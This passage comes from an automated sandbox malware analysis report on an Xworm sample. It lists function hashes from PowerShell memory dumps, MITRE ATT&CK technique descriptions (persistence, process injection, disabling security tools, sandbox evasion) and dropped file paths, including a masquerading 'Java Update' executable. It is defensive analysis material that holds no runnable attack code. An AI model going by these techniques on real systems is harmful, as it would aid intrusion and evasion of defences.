Source File: 00000007.00000002.2018203278.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9ba90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48e7b2c28043ebbb67dbb4b5bdce380eff62db37c7a116dd95d0ac109f09ca80
Instruction ID: 99675dc03a5d4a64ee62b5d69740ab405970919751a2483ee5498c159efa5e09
Opcode Fuzzy Hash: 48e7b2c28043ebbb67dbb4b5bdce380eff62db37c7a116dd95d0ac109f09ca80
Instruction Fuzzy Hash: 4E714E3160EB8A4FD31AD738C8A59A03BE0EF56219B1901FBD4D9CB1A3ED157807C311

Function 00007FFD9BA99D28 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2018203278.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9ba90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d256ef64ea39bc7164f834337131b7168124b9ea3866c4ed81c4b4655346e997
Instruction ID: 993d7df0e9d884ea6ea93ad8e2c6a5d2c138d2c3995e6d5d1151e11d07750237
Opcode Fuzzy Hash: d256ef64ea39bc7164f834337131b7168124b9ea3866c4ed81c4b4655346e997
Instruction Fuzzy Hash: 6FF0BE35918A8C8FDB51DF28C8291A87FE0FF25311B0601ABE809C7071DBA49A58CB81

Function 00007FFD9BA99748 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2018203278.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9ba90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3993db0a494b4e2ce4a851e36aef88a8b15247cc85b13903d7f0b67a5862f0d
Instruction ID: db6d312db8d985863f9e16922c4ec776158190b77c5e8f7e9acf2573812c1b95
Opcode Fuzzy Hash: b3993db0a494b4e2ce4a851e36aef88a8b15247cc85b13903d7f0b67a5862f0d
Instruction Fuzzy Hash: 91413A71A0DB8C9FDB189F5C981A6A8BBE0FB95310F00416FE049C3252DB70B855CBC2

Function 00007FFD9B97EF00 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2016829964.00007FFD9B97D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B97D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b97d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64c042baabdc5ac5d729492d876e46ca92da7172ff6ac6aafe4fcf04153e3fda
Instruction ID: 809966dd0c129e31b102c99b58a437a9e21e5dd3e77302906d8b8d63b3dc46a6
Opcode Fuzzy Hash: 64c042baabdc5ac5d729492d876e46ca92da7172ff6ac6aafe4fcf04153e3fda
Instruction Fuzzy Hash: C341167190EBC45FE7668B3998659523FF0EF57320B1A01DFD088CB1A3D625A846C7A2

Function 00007FFD9BA9A8CC Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2018203278.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9ba90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c22e38e81377816a7b6d16faed610e6dd1cfe7ef650e72280b6e36a0b9a9b75f
Instruction ID: 9eb9f75c7292575c9ff178c173c73ca646cbdae84137346cc70b24d2443750c8
Opcode Fuzzy Hash: c22e38e81377816a7b6d16faed610e6dd1cfe7ef650e72280b6e36a0b9a9b75f
Instruction Fuzzy Hash: B131F63190EB8C4FEB59DBA8D84A6E97FE0EF66320F0441AFD048C7162D664584ACB52

Function 00007FFD9BA933B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2018203278.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9ba90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction ID: e3f7d4d4d58fbdedf9c6af5607cce508aaa45b5c74a85b115e698ec3b0c19091
Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction Fuzzy Hash: 3D01A73020CB0C4FD748EF0CE051AA6B3E0FF85320F10056DE58AC36A1DA32E882CB45

Function 00007FFD9BB6414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2019711195.00007FFD9BB60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9bb60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e05e1eade0d67447d9424f45fe0693aafc622e1e4e0e9707dbba244b5df99f75
Instruction ID: 2a5bd8ed2cb5ed8cf173b9fde31bfd1be1d15cc0e94de8ee26bfb97160060002
Opcode Fuzzy Hash: e05e1eade0d67447d9424f45fe0693aafc622e1e4e0e9707dbba244b5df99f75
Instruction Fuzzy Hash: 54F09A32B0E9098FD769EA4CE4528A877E0FF5533471200BAE16DC71B3CA25EC408B40

Function 00007FFD9BB64400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2019711195.00007FFD9BB60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9bb60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe0ce53600a0093831fe22d02e72cc1055f6578bc41294db06ec51813596ca66
Instruction ID: a29a64ff74d616f5ed3101efe273cb934ce3ad40ad9c2fa0c269276b64b45825
Opcode Fuzzy Hash: fe0ce53600a0093831fe22d02e72cc1055f6578bc41294db06ec51813596ca66
Instruction Fuzzy Hash: 9EF0BE32A0E9498FD769EB4CE0628A873E0FF0532471200BAE15DC70A3CA26AC40C740

Function 00007FFD9BB641D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2019711195.00007FFD9BB60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9bb60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: c566b0446571b1b202708e4a8accaff3b77d1c5caeb67e9b55a4e0150a067685
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: 82E0E531B0C808CFDA78DA4CE0519A977E1FB9833571201BAD14EC75A1CA22ED518B80

Non-executed Functions

Function 00007FFD9BA98BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON

Download Yara Rule

Strings

O_^6, xrefs: 00007FFD9BA98BFA
O_^<, xrefs: 00007FFD9BA98C2A
O_^I, xrefs: 00007FFD9BA98C72
O_^J, xrefs: 00007FFD9BA98C7A
O_^F, xrefs: 00007FFD9BA98C6A

Memory Dump Source

Source File: 00000007.00000002.2018203278.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9ba90000_powershell.jbxd

Similarity

API ID:
String ID: O_^6$O_^<$O_^F$O_^I$O_^J
API String ID: 0-2439779554
Opcode ID: c6d3a8b0cf74e63db169cde05608f223816856023bfd5afab641cff7f2997cba
Instruction ID: 2a1e00b4d1e4dfcac2fbf5b301f8843fa2fa8b2ec9e5317a795ac5dcc03f8833
Opcode Fuzzy Hash: c6d3a8b0cf74e63db169cde05608f223816856023bfd5afab641cff7f2997cba
Instruction Fuzzy Hash: 9921327B3084169ED316B7AEBC009D87380CFE827F34802B3E26ECF643D914648B8690

Analysis Process: powershell.exePID: 3940, Parent PID: 7316COMMON

Executed Functions

Function 00007FFD9BB86605 Relevance: .4, Instructions: 439COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2206704200.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bb80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c32f9d6635346d2e6b8469fc16093a629a32470eb033ba314e21d68687623f87
Instruction ID: 6cdccfba7a0a9cdd4896582f6ecaa6c85e710822027ad3ab9a22ec581adfb7cb
Opcode Fuzzy Hash: c32f9d6635346d2e6b8469fc16093a629a32470eb033ba314e21d68687623f87
Instruction Fuzzy Hash: 7ED11432A0EACE0FEBA5AB6858655B57B91FF16318F0901FFD45EC70E3D928A905C341

Function 00007FFD9BAB9740 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2202350062.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bab0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ff7091e76b6909cb930d880c08ba804c5acc53c1510836516a659d1a3fc46bb
Instruction ID: eba68d50c8c29a2d2e3012a08ca5b7177105d5c45f37f7c96cb22cc11764ea14
Opcode Fuzzy Hash: 9ff7091e76b6909cb930d880c08ba804c5acc53c1510836516a659d1a3fc46bb
Instruction Fuzzy Hash: 8D514972A0EAC94FE7159B5C9C295B87FE0EF56310F0401BFD0A9831A3DA64B9458BC2

Function 00007FFD9B99EB80 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2201217468.00007FFD9B99D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B99D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b99d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4692974d555145df28fc9d4282badfd1bcffcc1d3c34d1cd5c43467d3ef5c12
Instruction ID: 843cc846672fdfc37aaa9d4b58e44c419dc1987aea6c4c36b77ee11ef4629588
Opcode Fuzzy Hash: e4692974d555145df28fc9d4282badfd1bcffcc1d3c34d1cd5c43467d3ef5c12
Instruction Fuzzy Hash: 9E414B3150EFC89FE7A68B3998519623FF0EF52314B1605DFD089CB1A3D625A80AC792

Function 00007FFD9BABA49C Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2202350062.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bab0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09213d2541e595acaecb7a33cc05150631711713d97cd37f7c07d09fce02e9ef
Instruction ID: f144ef68cbd3fbc61e66882d9f54141f866a41927dbe72b293ca7893bd500ae1
Opcode Fuzzy Hash: 09213d2541e595acaecb7a33cc05150631711713d97cd37f7c07d09fce02e9ef
Instruction Fuzzy Hash: CF21093190CB4C4FDB59DBACD84A7E97FE0EB96321F04426BD448C3152DA74A805CB92

Function 00007FFD9BAB33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2202350062.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bab0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: 17cf545b06c68c12749fae18c059a1fd3c0929f1bc305d672c46b898a287b68f
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 8301A73120CB0C4FD748EF0CE051AA6B3E0FF85320F10056EE58AC36A1DA32E882CB45

Function 00007FFD9BB8414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2206704200.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bb80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65ddf82bc1de9b4cac1f7342b007d12a5ffdeb791ff7ffa414287a2e11141245
Instruction ID: 2b7d983186ac8b342ef143f7b20347533711948212db3ddb9e9f3eee0f7c0e5b
Opcode Fuzzy Hash: 65ddf82bc1de9b4cac1f7342b007d12a5ffdeb791ff7ffa414287a2e11141245
Instruction Fuzzy Hash: BCF09032B0D9094FD769EA4CE45189477E0FF55324B1200BAE15DC71B3CA35EC408740

Function 00007FFD9BABA0FB Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2202350062.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bab0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b72a2130d37408c336ba0e1a75b071b1f214ea0f80abcb4d199e86b6a09438ae
Instruction ID: d4290b755f860b474957a38aaa6ce9b1fc1efda8439047196164dbbc5c0d76a1
Opcode Fuzzy Hash: b72a2130d37408c336ba0e1a75b071b1f214ea0f80abcb4d199e86b6a09438ae
Instruction Fuzzy Hash: C2F02431508A8D8FCB09EF28946A4E57F60EF55205B4502FBE81DCB062DB615504CBC2

Function 00007FFD9BB84400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2206704200.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bb80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 218580c49e25abb8330f7eaf565f20b386a9456a9fb043c66e0183da9ae0aabb
Instruction ID: f8e1fd036749847bda479d52db41c666d8f44e540076f2dd177018c485acfb5b
Opcode Fuzzy Hash: 218580c49e25abb8330f7eaf565f20b386a9456a9fb043c66e0183da9ae0aabb
Instruction Fuzzy Hash: 4FF0BE32A0E9498FD7A8EA4CE0618A873E0FF05328B1600BAE15DC70A3CA25AC40C740

Function 00007FFD9BB841D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2206704200.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bb80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: 2dff48247507cb871ad432cab4ca7b8e5aeb9198aba82777103ccfbb354ce81a
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: 6CE01A31B0C8088FDAB9EA4CE0519A977E1FB98325B1201BBD14EC75B1CA32ED518B80

Function 00007FFD9B99EC99 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2201217468.00007FFD9B99D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B99D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b99d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6e789e40d22f48bed9057cf57a8434b316b9bc26ca17628f0bed0edf1acb017
Instruction ID: 682d6699a1769c9802c4b658afa56b9efb5f4805eec50c54ea87927875f5ad8c
Opcode Fuzzy Hash: a6e789e40d22f48bed9057cf57a8434b316b9bc26ca17628f0bed0edf1acb017
Instruction Fuzzy Hash: 02F01C30629D0D9FCAE5EF69C495D2137E1FB58300B211568D09EC7261D634F941CB91

Non-executed Functions

Function 00007FFD9BAB8BD3 Relevance: 7.6, Strings: 6, Instructions: 146COMMON

Download Yara Rule

Strings

M_^5, xrefs: 00007FFD9BAB8BC9
M_^Y, xrefs: 00007FFD9BAB8CAA
M_^N, xrefs: 00007FFD9BAB8C62
M_^U, xrefs: 00007FFD9BAB8C8A
M_^@, xrefs: 00007FFD9BAB8C22
M_^4, xrefs: 00007FFD9BAB8BC2

Memory Dump Source

Source File: 0000000B.00000002.2202350062.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bab0000_powershell.jbxd

Similarity

API ID:
String ID: M_^4$M_^5$M_^@$M_^N$M_^U$M_^Y
API String ID: 0-3990506085
Opcode ID: a10203abb5c90ed1e212a8b3e4b305e25375224e9a1c98102282aa182a5a7975
Instruction ID: e88ffeaacacaa6429b814de8c3f02bd082a981710e34438a64def18a6f316a0a
Opcode Fuzzy Hash: a10203abb5c90ed1e212a8b3e4b305e25375224e9a1c98102282aa182a5a7975
Instruction Fuzzy Hash: DC3119677085298AC32576BCB8559EC7784DFA833F78507F7E1A9CF093AC15608B8AC0

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 03VPFXH490.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Java Update (32bit).exe

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Log.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1jv2nk3n.zwd.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bxycjfj5.k3i.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eknntanq.aiv.psm1

